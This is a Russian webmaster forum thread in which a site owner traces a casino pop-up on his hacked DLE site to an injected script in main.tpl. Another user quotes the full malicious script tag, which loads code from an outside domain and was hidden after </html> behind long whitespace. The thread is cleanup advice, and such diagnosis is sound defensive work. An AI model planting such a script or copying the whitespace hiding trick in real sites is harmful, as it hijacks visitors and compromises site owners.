Как найти шпиона на сайте

Как найти шпиона на сайте, Взломали сайт на DLE 10.2

Сообщений: 1012 Регистрация: Ноя 2011

26 Января 2017 14:05

Сайт был взломан, причем, обнаружил только взлом админки, глубже не рыл. Доступ восстановил, больше в админпалели никто не роется, но проблема осталась.Куда-то запихнули шпиона и теперь при клике мышкой открывается второе окно с сайтом про какое-то казино.

Движок DLE ставили спецы с хостинга сами (они нет-нет предлагают обновиться бесплатно), я ничего не менял. Всегда работало хорошо, только после взлома осталась одна проблема.

Подскажите, где искать гадский код?

Изменено: Юрий Д - 26 Января 2017 14:06

"ПисАть, как и пИсать, нужно, когда уже не можешь" М.М. Жванецкий.

Награды СССР

WGN

Сообщений: 9907 Регистрация: Июн 2015

26 Января 2017 19:42

Цитата

Юрий Д пишет:
Сайт был взломан, причем, обнаружил только взлом админки, глубже не рыл. Доступ восстановил, больше в админпалели никто не роется, но проблема осталась.Куда-то запихнули шпиона и теперь при клике мышкой открывается второе окно с сайтом про какое-то казино.

Движок DLE ставили спецы с хостинга сами (они нет-нет предлагают обновиться бесплатно), я ничего не менял. Всегда работало хорошо, только после взлома осталась одна проблема.

Подскажите, где искать гадский код?

Сделайте откат

✔(НЕЙРОСЕТЬ) Качественные живые посетители на ваш сайт, блог, канал — Бесплатно!!!

♛ЛУЧШИЙ ПРОВЕРЕННЫЙ и САМЫЙ НЕДОРОГОЙ ХОСТИНГ: АКЦИИ!

Юрий Д

Сообщений: 1012 Регистрация: Ноя 2011

27 Января 2017 13:02

WGN, откат, не получается, те бэкапы, которые сохранились, все уже с вредоносным кодом...

Поискал шпиона методом тыка: при замене файла main.tpl в шаблонах на чистый файл из дистрибутива, проблема исчезает - получается, что код в нём.
Но вот, найти не смог... Перерыл весь файл, ничего подозрительного не нашел.

Как хоть он должен выглядеть? Может кто-нибудь пример покажет?

vik1105

Сообщений: 27 Регистрация: Мар 2015

27 Января 2017 13:17

можно адрес сайта?

Юрий Д

Сообщений: 1012 Регистрация: Ноя 2011

27 Января 2017 13:34

vik1105, адрес у меня в подписи, нижний

vik1105

Сообщений: 27 Регистрация: Мар 2015

27 Января 2017 13:52

в самом низу после </html> что это за скрипт? если не Ваш, то это он.

vik1105

Сообщений: 27 Регистрация: Мар 2015

27 Января 2017 13:58

Цитата
<script async language="javascript" charset="UTF-8" type="text/javascript" src="rohlita.ru/6xj87m86pzm80kdafh1kb96pn3lgyehco6puieccrnf990zunmuv76h?6b42bbis=aDcbi ( rohlita.ru/6xj87m86pzm80kdafh1kb96pn3lgyehco6puieccrnf990zunmuv76h?6b42bbis=aDcbi )"></script>

Юрий Д

Сообщений: 1012 Регистрация: Ноя 2011

27 Января 2017 13:58

vik1105, да, похоже, что это он и есть...

Изменено: Юрий Д - 27 Января 2017 13:59

vik1105

Сообщений: 27 Регистрация: Мар 2015

27 Января 2017 14:05

удалите этот скрипт, и поставьте на будущее antishell.ru/]AntiShell Скрипт он будет контролировать все действия на сайте.

Юрий Д

Сообщений: 1012 Регистрация: Ноя 2011

#10

27 Января 2017 14:15

Всё, проблема устранена! ))) Код был замаскирован большим количеством пробелов. поэтому в окне редактирования и не был виден.
Всем огромное спасибо за помощь! Отдельный респект vik1105!

~UnReal~ ™

Сообщений: 62 Регистрация: Июл 2011

#11

23 Февраля 2017 15:12

Этой маскировке три тысячи лет, но до сих пор работает )

Проект Снайпер Арена и Спортивный клуб

nebot

Сообщений: 1196 Регистрация: Окт 2015

#12

23 Февраля 2017 17:11

Цитата
Юрий Д пишет: Всё, проблема устранена!

возможно ненадолго, советую сменить все пароли от сайтов и хостинга проверить комп на троянов, могут заливать на хостинге

Шаблоны сайтов

Биржа постоянных ссылок!

Качественный хостинг!

Похожие темы:

13.01.2019 15:55	Помогите найти чат для DLE 13
10.09.2018 23:27	Как найти код вызова рекламы в шаблоне?
09.10.2016 09:57	Помогите найти хороший модуль интернет магазина
05.09.2016 02:33	Помогите найти
19.02.2014 03:57	Помогите найти шаблон

Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)

Новые темы	Объявления	Свободное общение
22:21 Стоит ли добавлять сайт в Rambler топ 100? 22:14 Rotapost прикрыли! Чем пользоваться? 12:05 DLE не создает бэкап с админки сайта, как быть? 11:52 Ночной бар в Паттайе: как случайная встреча с "тайкой" и её кадыком перевернула мой взгляд на продвижение сайта в Google 2026 18:52 SEO под нейро 15:55 LOSPOLLOS.COM - Конвертим по рецепту Хайзенберга. Dating, Mainstream, Binary Options 15:15 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу.	21:47 Продам pubghelp.ru 18:47 Full-Stack Developer — Сайты и Софт любой сложности \| Developer Websites and Soft of any Complexity! 18:04 SnapSwap.io — мгновенный обмен BTC, XMR, ETH, USDT и других криптовалют без регистрации! 17:51 Инвайт, спам, парсинг, обучение/Максимально быстро и качественно 16:25 CryptoMonitor.info - ваш надеждный обменник BTC USDT XMR (без KYC) 15:24 №1 Рассылка / Инвайтинг [TELEGRAM] \| Приватный метод 15:24 Trustpilot Reviews \| Подниму рейтинг вашей компании	16:50 Компьютерная мышь 11:32 Про мясо 22:11 С юмором по жизни! 23:03 Точные прогнозы на футбол 13:08 Бесплатный майнинг Tether (USDT) 16:49 monetizer.agency – рекламная сеть для взрослого и развлекательного трафика. 100$ новому вебмастеру 20:43 Добро пожаловать в цифровой мир...